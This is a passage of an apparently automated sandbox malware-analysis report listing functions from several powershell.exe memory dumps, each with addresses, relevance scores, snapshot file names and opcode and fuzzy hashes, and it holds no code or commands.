Opcode ID: 5ef8746f52c010c076068684330ff94baa198b2855040ae1f5e9eb3beedf06f5
Instruction ID: 39e7349cf81f7c1a2c5c088634020b6088c953f7144dd96ca5783d77e590230e
Opcode Fuzzy Hash: 5ef8746f52c010c076068684330ff94baa198b2855040ae1f5e9eb3beedf06f5
Instruction Fuzzy Hash: C9C1D33190CA5C8FDB59DB68D845BE9BBB1FF55320F0082AED04DD3292DB74A985CB81

Function 00007FFAACCB8034 Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2529665094.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaaccb0000_Or3dzp4vB1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9603b9b680f32ce3a99c2c6d1efef77fab75f6e2989f833ca50e9433122c304
Instruction ID: fde79969dd0dd70dcf0ada8c07f1fabf538008cc3d913f9603866d5b7ea98058
Opcode Fuzzy Hash: a9603b9b680f32ce3a99c2c6d1efef77fab75f6e2989f833ca50e9433122c304
Instruction Fuzzy Hash: 6791C67190CA4C8FDB59DFA8D849AE9BBF1EF95310F0482AED04DD3252DE74A845CB81

Analysis Process: powershell.exePID: 7388, Parent PID: 7300COMMON

Executed Functions

Function 00007FFAACD7660A Relevance: .4, Instructions: 434COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1292230087.00007FFAACD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacd70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ccc8603d66da707b09e10e3b6ba5a0d91de29fa9ff6fe5f5126bee5b1d38c5d
Instruction ID: b553c263efbcdee8259943f536604b1e4ea2fdad02529963475ed63251809666
Opcode Fuzzy Hash: 9ccc8603d66da707b09e10e3b6ba5a0d91de29fa9ff6fe5f5126bee5b1d38c5d
Instruction Fuzzy Hash: A7C16B71E0EA9A8FF755A76848195B9BBE0EF46310B4841FEE45DC70D3EA28DC0983D1

Function 00007FFAACD76633 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1292230087.00007FFAACD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacd70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d1db6032652124afd3c1e0834d33811eb7ca2da1d822ece0573fb137f4cdcba
Instruction ID: ca61f02d2f56153315b441556ac010a1705568a8c49a083821c883466a2809fc
Opcode Fuzzy Hash: 2d1db6032652124afd3c1e0834d33811eb7ca2da1d822ece0573fb137f4cdcba
Instruction Fuzzy Hash: A6810665E0FBE68FF76697684865578BFA0EF46200B5840FED45DCB0D3E928DC0A8391

Function 00007FFAACD74073 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1292230087.00007FFAACD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacd70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bd7079af406cb27fe574d517781cdb249d80ed122bf9187340b02c2015ed237
Instruction ID: 5a8016267138b49027d3f9c3e05b2a6af67a154531004eec4afeb9bd21ffac53
Opcode Fuzzy Hash: 5bd7079af406cb27fe574d517781cdb249d80ed122bf9187340b02c2015ed237
Instruction Fuzzy Hash: 75515832B0DA568FF79ADB2C84116747BD2DF92220B5840BBC45EC7193DE34EC098780

Function 00007FFAACD74370 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1292230087.00007FFAACD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacd70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 362e25fac7b7ee183a98772f7aeb964069d0c1d6c3be7460968bf55b28d6121a
Instruction ID: 74924a803eb451da97b2eea8099892a807559a8d8a01a4a7b4e9b6a6f43d401e
Opcode Fuzzy Hash: 362e25fac7b7ee183a98772f7aeb964069d0c1d6c3be7460968bf55b28d6121a
Instruction Fuzzy Hash: 5F414932B0EA598FF7A6D76C94505B47BD1DF41224B4844BEC05DC7483ED24EC1887C1

Function 00007FFAACB8E380 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1291439527.00007FFAACB8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacb8d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e19891767e8889b72158ba40a1678728d0a1c2e34306ac89c40d6d5b31e79f5
Instruction ID: b0ba92dfa60435a4c8213c6789915d9d1549c8c7abb00d2012af00c61a0cea18
Opcode Fuzzy Hash: 8e19891767e8889b72158ba40a1678728d0a1c2e34306ac89c40d6d5b31e79f5
Instruction Fuzzy Hash: 1641E37140EBC48FE7569B28D845A623FB0EF57324B1505EFD08CCB1A3D626E84AC792

Function 00007FFAACCA9778 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1291852762.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacca0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b602cd77163c0cb3aefc31d50b6b92aa3507e06fbb9afd7c4473fb3d7a290fcc
Instruction ID: 5c7261f0a311b4e75c2719ffe9ebae974209e59bf47927fde4b6892d9bc83b13
Opcode Fuzzy Hash: b602cd77163c0cb3aefc31d50b6b92aa3507e06fbb9afd7c4473fb3d7a290fcc
Instruction Fuzzy Hash: BA31A57191CB4C8FDB5C9F5CA84B6A97BE1FB99711F00822FE449D3251CB70A8558BC2

Function 00007FFAACCAA8CC Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1291852762.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacca0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5246998bade83078c8c85129a53453fc9604f07fd5c0c9fc07ab22880591a84d
Instruction ID: d9b660a0e35ac44da645602f9654d14e20b353c9a6f104f92f33a23842c70479
Opcode Fuzzy Hash: 5246998bade83078c8c85129a53453fc9604f07fd5c0c9fc07ab22880591a84d
Instruction Fuzzy Hash: 13312B7180DB8C8FEB59CFAC98496E97FE0EF56720F0441AFD04DC7152D664980ACB91

Function 00007FFAACD740BF Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1292230087.00007FFAACD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacd70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec9f1027e38aabdd07ef77c1f4f91d5158d8611e0a5e675794f9a7a751a97b68
Instruction ID: 9bc3c5e1f67ca9922b81b6377e49fc1eb3dc96eba28dea36c4aaaf645cbefe88
Opcode Fuzzy Hash: ec9f1027e38aabdd07ef77c1f4f91d5158d8611e0a5e675794f9a7a751a97b68
Instruction Fuzzy Hash: 3D212D72B0EAA78FF396EB1C44551746FC2DF52210B5940BAC46DC75D2DD38DC088781

Function 00007FFAACD743BC Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1292230087.00007FFAACD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacd70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc64f4a6ae083ed096f7c00b69c0ed33b3a3ad548eb8278015eb63dfcd5fb635
Instruction ID: b541863ebd31817b5a973d2dfdd03fca8319f9a59a4c697ab1cbb8a15dc83563
Opcode Fuzzy Hash: bc64f4a6ae083ed096f7c00b69c0ed33b3a3ad548eb8278015eb63dfcd5fb635
Instruction Fuzzy Hash: 39110672A0F6A98FF7A6D72C94945B47FD1EF0222474940FAD06DC7493DE28EC088781

Function 00007FFAACCA33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1291852762.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacca0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction ID: 141d00dcf02e0b8f29e4104d0b8054a5580f9ba0704c2e0073df697dd715e98f
Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction Fuzzy Hash: 1D01447115CB088FD744EF0CE455AA5B7E0FB99364F10056DE58AC3661DA26E882CB45

Function 00007FFAACCAA2A9 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1291852762.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacca0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 459f6497fc2a8922dc70b1a0aeab7f2606eb71d42cbffa15e7f1a8ad927bd768
Instruction ID: c3a7ac04b45980e567e4bc4b78ce6d732c0e70e888936679dc18669a94ba8b0c
Opcode Fuzzy Hash: 459f6497fc2a8922dc70b1a0aeab7f2606eb71d42cbffa15e7f1a8ad927bd768
Instruction Fuzzy Hash: 72E09A35804A4C8F9B48EF18C81A4E97FE0FB68201B01429AE81DC3120DB319A68CBC2

Non-executed Functions

Function 00007FFAACCA8995 Relevance: 5.1, Strings: 4, Instructions: 144COMMON

Download Yara Rule

Strings

O_^, xrefs: 00007FFAACCA8AC2
O_^, xrefs: 00007FFAACCA8A6A
O_^, xrefs: 00007FFAACCA89C9
O_^, xrefs: 00007FFAACCA8A2A

Memory Dump Source

Source File: 00000002.00000002.1291852762.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacca0000_powershell.jbxd

Similarity

API ID:
String ID: O_^$O_^$O_^$O_^
API String ID: 0-109995703
Opcode ID: dd71f5bb2716e8082a497732e2a1244f0589131962135db29a885ab9e54acf98
Instruction ID: 80b5fc1f2ab87d8cfa77e38756aaa52c4a2b7c6461b528c04ca7ed476fe881d1
Opcode Fuzzy Hash: dd71f5bb2716e8082a497732e2a1244f0589131962135db29a885ab9e54acf98
Instruction Fuzzy Hash: E241C19290F7C38FF3564B2948691E12FE2EF63765B0D41F6C08D8B193ED09694A83D2

Function 00007FFAACCA89FA Relevance: 5.1, Strings: 4, Instructions: 103COMMON

Download Yara Rule

Strings

O_^, xrefs: 00007FFAACCA8AC2
O_^, xrefs: 00007FFAACCA8A6A
O_^, xrefs: 00007FFAACCA89FA
O_^, xrefs: 00007FFAACCA8A2A

Memory Dump Source

Source File: 00000002.00000002.1291852762.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaacca0000_powershell.jbxd

Similarity

API ID:
String ID: O_^$O_^$O_^$O_^
API String ID: 0-109995703
Opcode ID: 5131eef545c4dcfe4e5023b824ab2b3714bea5700b36527026dab429daa20bcd
Instruction ID: 011d637cd5357481498942496ab090a832c1ec6dbcd036c01eaef22121d3cda8
Opcode Fuzzy Hash: 5131eef545c4dcfe4e5023b824ab2b3714bea5700b36527026dab429daa20bcd
Instruction Fuzzy Hash: 1E31E693A0E7C3CBF75A871948691E12FD2EF6376A70941F6C08D8A583EC19AD4A42D1

Analysis Process: powershell.exePID: 7996, Parent PID: 7300COMMON

Executed Functions

Function 00007FFAACDB6605 Relevance: .4, Instructions: 442COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1393675116.00007FFAACDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffaacdb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10f6151925bda1c6189ce50171bf0ad488ef44c52034abcf3b2cd287de1f26ee
Instruction ID: 8ed8a70227d4d66814b80604f15c29d28ebf1eb65f0754d1785d06c50160a653
Opcode Fuzzy Hash: 10f6151925bda1c6189ce50171bf0ad488ef44c52034abcf3b2cd287de1f26ee
Instruction Fuzzy Hash: 06D16A65A0EA8A8FF769BB7888555B5BFA0EF56310B0401FEE45DC70D3D918D80AC3D1

Function 00007FFAACCEA9BC Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1392661692.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffaacce0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4523a5ad44f62af3ed5a1132de08f2dc7c58ac8a009818b9915ad162379e56e
Instruction ID: aabe0ea92d586aee7020b28064c94ce53ac48ffec8ac106f78112d50b5f9b9ba
Opcode Fuzzy Hash: e4523a5ad44f62af3ed5a1132de08f2dc7c58ac8a009818b9915ad162379e56e
Instruction Fuzzy Hash: 8A81587250EB858FE3059B2898994A17FE0FF5361970841FED089C7193EA1AA84BC781

Function 00007FFAACDB4073 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1393675116.00007FFAACDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffaacdb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 951492b62b479337cf1645039122d23be2a061a7cf6712cacd021ddfc27df8be
Instruction ID: 8dc7918b14bea80abdb43785754f26fc9b81c27841ecaa7b41f26960ea0458da
Opcode Fuzzy Hash: 951492b62b479337cf1645039122d23be2a061a7cf6712cacd021ddfc27df8be
Instruction Fuzzy Hash: 07511422B0EA868FF799DB2C84516757BD2EF96260B5841BBC15DC7193DE24EC098381

Function 00007FFAACDB4370 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1393675116.00007FFAACDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffaacdb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7327b19d25031cd9d6932a50c925d3958734a4e4e047f72f4e779eb52673a617
Instruction ID: 3438fc1e0b6a66663c779258973026f21163413be314b26b38583ac3547d8c14
Opcode Fuzzy Hash: 7327b19d25031cd9d6932a50c925d3958734a4e4e047f72f4e779eb52673a617
Instruction Fuzzy Hash: 40412672B0EA898FF7A5D76C94516B4BBD1EF86220B4845BED05DC7183EE18EC1883C1

Function 00007FFAACBCED40 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1391647407.00007FFAACBCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffaacbcd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dbc504fa2e27b2c009095ce78ec6f007e1ab4ccbe3ebf28d5229d4a4e1ca180
Instruction ID: 30501ef8417a23d0f0ff4d75331baefa8f9e3597dad8a072a697026cfcbe8dea
Opcode Fuzzy Hash: 0dbc504fa2e27b2c009095ce78ec6f007e1ab4ccbe3ebf28d5229d4a4e1ca180
Instruction Fuzzy Hash: 2A41C37140EBD48FE7579B28D8459523FF0EF57320B1906DFD088CB1A3D625A84AC7A2

Function 00007FFAACCE9790 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1392661692.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffaacce0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7405673d3a952e457ce1af928fa96a0413eb77b7b213ef18c6e94721e1bade38
Instruction ID: 11fb866eee4429f953ee08fa9da83ab435b30888eebbf2cbf2aa90bf77707caa
Opcode Fuzzy Hash: 7405673d3a952e457ce1af928fa96a0413eb77b7b213ef18c6e94721e1bade38
Instruction Fuzzy Hash: 9931C77191CB488FEB189B5C9C0A6A97BE0FB99311F00426FE44DD3252DB74A855CBC2

Function 00007FFAACCEA7C6 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1392661692.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffaacce0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f32f08899d0e79f78d16ed8de3dc551aa619b6d134c46d41ce8e0e3b1861330f
Instruction ID: 334da792ec8b17782773849959ac3a1d2ff8c6896cc555e487bbf9858e404e52
Opcode Fuzzy Hash: f32f08899d0e79f78d16ed8de3dc551aa619b6d134c46d41ce8e0e3b1861330f
Instruction Fuzzy Hash: BC21E57190CA4C8FEB58DFAC984A7EA7BE0EB96321F04816FD44DC3112D674A40ACB91

Function 00007FFAACDB40BF Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1393675116.00007FFAACDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffaacdb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40700fdd54fe97a6da2b1246a1a5053eec43f055ae36d3f38c51cb3a3d773975
Instruction ID: c7d9d39d10803160660ef43fdc7a173f0f6e90d9583b857da28de51e6cbc47ab
Opcode Fuzzy Hash: 40700fdd54fe97a6da2b1246a1a5053eec43f055ae36d3f38c51cb3a3d773975
Instruction Fuzzy Hash: 1721D262E1EA878FF7A5DB1C84555746ED1EF56250B4980BAD16DC71D3CE28EC088381

Function 00007FFAACDB43BC Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1393675116.00007FFAACDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffaacdb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9427370a0a6e268e27c0609ee7e850f9c4ce014d97d7681080edc17529687f18
Instruction ID: bfb7cd2acb9544a92fc5c6cb73e27e3b80c392791ca1853e3e1047191f2e203e
Opcode Fuzzy Hash: 9427370a0a6e268e27c0609ee7e850f9c4ce014d97d7681080edc17529687f18
Instruction Fuzzy Hash: 9B11E072A4E6858FF7A5D72894549B8BFE0EF0222074D40BAD06DC7193DE18EC188381

Function 00007FFAACCE33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1392661692.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffaacce0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction ID: 2679195378a422fb07696bd46d7ab694e2d0dc30f21eb567d9445c9b80d07752
Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction Fuzzy Hash: BD01847010CB088FD744EF0CE051AA5B3E0FB89320F10052DE58AC3661DB22E882CB41

Function 00007FFAACCEA2C9 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1392661692.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffaacce0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 274be616b2a51ed74687d74400572b31c09e48ba4e80211f0984dd83a716637d
Instruction ID: 8603593747c3bc378dae8a0435b85a5b2a3783b4bc7012682270a4b9eb7a79ac
Opcode Fuzzy Hash: 274be616b2a51ed74687d74400572b31c09e48ba4e80211f0984dd83a716637d
Instruction Fuzzy Hash: A0E04875904A4C8F9B44DF18D4555E57FE0FF65301B00425BE41DD7120DB71D958CBC1

Non-executed Functions

Function 00007FFAACCE896C Relevance: 6.4, Strings: 5, Instructions: 155COMMON

Download Yara Rule

Strings

K_^, xrefs: 00007FFAACCE8A12
K_^, xrefs: 00007FFAACCE8A62
K_^, xrefs: 00007FFAACCE8A22
K_^, xrefs: 00007FFAACCE89C2
K_^, xrefs: 00007FFAACCE8AC9

Memory Dump Source

Source File: 0000000B.00000002.1392661692.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffaacce0000_powershell.jbxd

Similarity

API ID:
String ID: K_^$K_^$K_^$K_^$K_^
API String ID: 0-3188868157
Opcode ID: 28653a003dc9c62a3316150380dd53ef5522c4b7c8611899054a74371b70cf64
Instruction ID: 8f2725a55ebb477b6d7697b9758a034eb671645a0744b6184a8922ca911953d4
Opcode Fuzzy Hash: 28653a003dc9c62a3316150380dd53ef5522c4b7c8611899054a74371b70cf64
Instruction Fuzzy Hash: 494185E390E7D79BF75A0B2C58660A17FE0EF6321970D42F6D0C8CB493EE19594B5282

Function 00007FFAACCE8BFA Relevance: 6.3, Strings: 5, Instructions: 91COMMON

Download Yara Rule

Strings

K_^5, xrefs: 00007FFAACCE8BFA
K_^8, xrefs: 00007FFAACCE8C12
K_^F, xrefs: 00007FFAACCE8C72
K_^I, xrefs: 00007FFAACCE8C7A
K_^K, xrefs: 00007FFAACCE8C8A

Memory Dump Source

Source File: 0000000B.00000002.1392661692.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffaacce0000_powershell.jbxd

Similarity

API ID:
String ID: K_^5$K_^8$K_^F$K_^I$K_^K
API String ID: 0-34091245
Opcode ID: ace40cb58427820dc8cc6ecfbb6781f1a04f7cece3a8c5827ceb85a0f112097e
Instruction ID: 069b2a38ae086bb249fdf1d8416b071e43203357c6d562934ee99a60de23448b
Opcode Fuzzy Hash: ace40cb58427820dc8cc6ecfbb6781f1a04f7cece3a8c5827ceb85a0f112097e
Instruction Fuzzy Hash: FE2134F7A181165EDA013B7DA8459E87BE4DF8927938942F2D19CCF103DE14A18B8984

Function 00007FFAACCE89F3 Relevance: 5.1, Strings: 4, Instructions: 115COMMON

Download Yara Rule

Strings

K_^, xrefs: 00007FFAACCE8A12
K_^, xrefs: 00007FFAACCE8A62
K_^, xrefs: 00007FFAACCE8A22
K_^, xrefs: 00007FFAACCE8AC9

Memory Dump Source

Source File: 0000000B.00000002.1392661692.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffaacce0000_powershell.jbxd

Similarity

API ID:
String ID: K_^$K_^$K_^$K_^
API String ID: 0-4267328068
Opcode ID: 5cea140e445825aa0b87c96cfb018793f1cc788ec32b152ad5bb3a9a6e97681a
Instruction ID: 4772ece2f0f07cf296262d965f7c489c38cfca6833785c16106562700608616a
Opcode Fuzzy Hash: 5cea140e445825aa0b87c96cfb018793f1cc788ec32b152ad5bb3a9a6e97681a
Instruction Fuzzy Hash: 1431B3E3A0EBD79BF65A071C58660A1BFE0EF6321930D42F6D0C8CB593EE15594B52C1

Analysis Process: powershell.exePID: 6752, Parent PID: 7300COMMON

Executed Functions

Function 00007FFAACD7660A Relevance: .5, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1574750305.00007FFAACD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffaacd70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06dafc5b9be83a2d38143189c4f51d6dfa0b3e296040934c9dfffa3631efe9d5
Instruction ID: 261114423e644d88cd7bc9f923ab43345dfecb598dcc4f0c598928a7768e7683
Opcode Fuzzy Hash: 06dafc5b9be83a2d38143189c4f51d6dfa0b3e296040934c9dfffa3631efe9d5
Instruction Fuzzy Hash: DBD15971E0EA9A8FF765AB6888555B5BBA0EF56310B0401FED45DC70D3E928DC0A83D1

Function 00007FFAACD74073 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1574750305.00007FFAACD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffaacd70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a51964d9c072022db55b2497426bba46487b8542343af279038762ecac694512
Instruction ID: a7e4479ad89fb5a509e728058278201f4263726881eb861e1d84d8d040689451
Opcode Fuzzy Hash: a51964d9c072022db55b2497426bba46487b8542343af279038762ecac694512
Instruction Fuzzy Hash: B9513622B0DA968FF79AEB2C84116747BD2DF96220B4840BBC15DC7193DE34EC098781

Function 00007FFAACD74370 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1574750305.00007FFAACD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffaacd70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b38f8c4a5a29bef7d2f39566b465aece3213783bb3c801ae19816f815bde153
Instruction ID: 35d7e8d53d3dba36f08ad7cedce70383417ff22dfe66f8ed47b84a83c1795a98
Opcode Fuzzy Hash: 6b38f8c4a5a29bef7d2f39566b465aece3213783bb3c801ae19816f815bde153
Instruction Fuzzy Hash: 03413832B0EA598FF7A6D76C94105B47BD1EF82220B4844BED05DC7483EE24EC1887C1

Function 00007FFAACCA9758 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1573969962.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffaacca0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b44040c9a7546edd0de92eb3494aeca5c5bbc49b7e9d077805c8b2bab625f2b6
Instruction ID: b67b2d860414fd46879c02bf01fe7348a7220b2d783ee29c5a7ce05302c33685
Opcode Fuzzy Hash: b44040c9a7546edd0de92eb3494aeca5c5bbc49b7e9d077805c8b2bab625f2b6
Instruction Fuzzy Hash: 9531EA7190CB488FEB189F4CA84A6B97BE1FB95711F00812FE049D3252DB74A856CBC2

Function 00007FFAACB8EAA8 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1572766771.00007FFAACB8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffaacb8d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3020c51bf979c7f66be724d50e345ad9dcab8456d4234319938d82a5a641ae7
Instruction ID: 217ab641ddd7d7a9e96c53c1e34ac022173c3fccc8e98a38205a948b83282c4b
Opcode Fuzzy Hash: e3020c51bf979c7f66be724d50e345ad9dcab8456d4234319938d82a5a641ae7
Instruction Fuzzy Hash: B941177140EBC49FE7569B29D8819523FF0EF57320B1505DFE088CB1A3D625E84AC792

Function 00007FFAACCAA47C Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1573969962.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false

Joe Sandbox IDA Plugin

